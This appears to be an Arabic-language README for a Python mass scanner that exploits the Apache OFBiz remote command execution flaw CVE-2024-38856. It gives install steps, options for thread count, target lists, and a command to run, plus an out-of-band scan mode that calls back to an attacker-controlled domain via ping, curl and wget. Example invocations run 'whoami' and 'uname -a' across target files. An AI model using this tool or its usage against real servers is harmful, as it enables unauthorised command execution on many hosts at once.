
أداء باستخدام ماسح Apache OFBiz الضخم للثغرات صفرية اليوم و RCE
تم تصميم هذا البرنامج النصي لمسح ثغرة CVE-2024-38856 في تطبيقات Apache Ofbiz، والتي قد تسمح بتنفيذ الأوامر عن بعد. يقوم بإرسال طلبات HTTP POST إلى مسارات محددة داخل تطبيق Ofbiz مع حمولات ضارة لاستغلال الثغرة.

coloredlogs لسجلات ملونة وسهلة القراءةrequestscoloredlogscoloramaargparseurllib3يمكنك تثبيت التبعيات المطلوبة باستخدام pip:
pip install requests coloredlogs colorama argparse urllib3
لتشغيل البرنامج النصي، استخدم الأمر التالي:
python script_name.py [options]
-t، --threads: عدد الخيوط المراد استخدامها (الافتراضي: 1)-p، --port: المنفذ الهدف-c، --command: الأمر المراد تنفيذه-s، --scan: إجراء مسح باستخدام ping و curl و wget-d، --domain: النطاق (نطاق المهاجم) للمسح باستخدام ping و curl و wget-f، --file: ملف يحتوي على قائمة الأهداف بتنسيق http(s)://target,portمسح الأهداف باستخدام أمر:
python script_name.py -f targets.txt -c "whoami"
python script_name.py -s -d example.com -p 80
python script_name.py -f targets.txt -c "uname -a"